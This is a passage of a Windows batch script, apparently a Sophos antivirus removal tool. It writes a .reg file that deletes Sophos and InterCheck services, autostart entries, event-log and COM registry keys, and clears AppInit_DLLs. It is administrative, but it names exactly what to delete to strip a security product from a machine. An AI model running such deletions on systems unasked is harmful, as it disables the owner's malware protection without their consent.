ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessControl] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVOnAccessFilter] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SAVService] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Agent] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos AutoUpdate Service] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Message Router] >> %TEMP%\SOTMP.REG
ECHO [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\SophosBootDriver] >> %TEMP%\SOTMP.REG

REM === Sophos 4.x Removal ===

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo "InterCheckMonitor"=%nulvar% >> %TEMP%\SOTMP.REG
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] >> %TEMP%\SOTMP.REG
echo "Sweep95"=%nulvar% >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VxD\Sophos ICSTATIC] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-Sweep95] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sophos-SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_CURRENT_USER\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_USERS\.DEFAULT\Software\Sophos\SweepNT] >> %TEMP%\SOTMP.REG

REM === CurrentControlSet ===

echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG

REM === ControlSet001 ===

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG

REM === ControlSet002 ===

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\Application\SweepNT] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Eventlog\System\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Control] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Filter] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\InterCheck Support 12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_CONTROL] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_FILTER] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_01] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_02] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_03] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_04] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_05] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_06] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_07] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_08] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_09] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_10] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_11] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_INTERCHECK_SUPPORT_12] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MEMSWEEP] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SWEEPUPDATE] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPNET] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPSRV.SYS] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_SWEEPUPDATE] >> %TEMP%\SOTMP.REG

REM === Remote Update Reg Entries ===

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Sophos\Remote Update] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\CacheMgr] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\Root\LEGACY_CACHEMGR] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Remote Update] >> %TEMP%\SOTMP.REG

REM === BOPS ===

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows] >> %TEMP%\SOTMP.REG
echo "AppInit_DLLs"=%nulvar% >> %TEMP%\SOTMP.REG

REM ==== AppInit_DLLs BACKUP ====
REGEDIT /E %temp%\AppInit_BAK.reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\"

REM === Remove InProgress (Suspended Installers)
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Inprogress] >> %TEMP%\SOTMP.REG

REM === SAU COM Objects Removal ===

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ALUpdNotification.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ClientUpdate.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ActiveLinkClient.ConnectionListener.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.PropertiesDialog.1] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\iMonitor.UpdateNotification2.1] >> %TEMP%\SOTMP.REG

echo [-HKEY_CLASSES_ROOT\Interface\{1474930F-6D2F-42E1-A604-958E2A287D32}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{1E4DEB88-3386-4E80-A7D1-9997C39A570D}] >> %TEMP%\SOTMP.REG
echo [-HKEY_CLASSES_ROOT\Interface\{4629634A-1AF8-4E02-B5A2-0273FE770C74}] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4C7CA525-1016-4C70-A116-7AA4FE0DAF97}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7CBCADE4-7AA7-43AE-BD20-D88223B6353E}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CBF57A6D-243A-4FE7-B9FA-22A67B4D056B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{FF20AFAB-E530-4277-A2EB-A9051D7E3435}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{BBA960BE-6A97-4996-9ECB-AA313BEBF37A}] >> %TEMP%\SOTMP.REG

echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\ALsvc.exe] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{037F2C54-40E9-437E-B8EA-487AEB148A4B}] >> %TEMP%\SOTMP.REG
echo [-HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{5272D27B-11B1-4687-85FC-21B6214E554A}] >> %TEMP%\SOTMP.REG
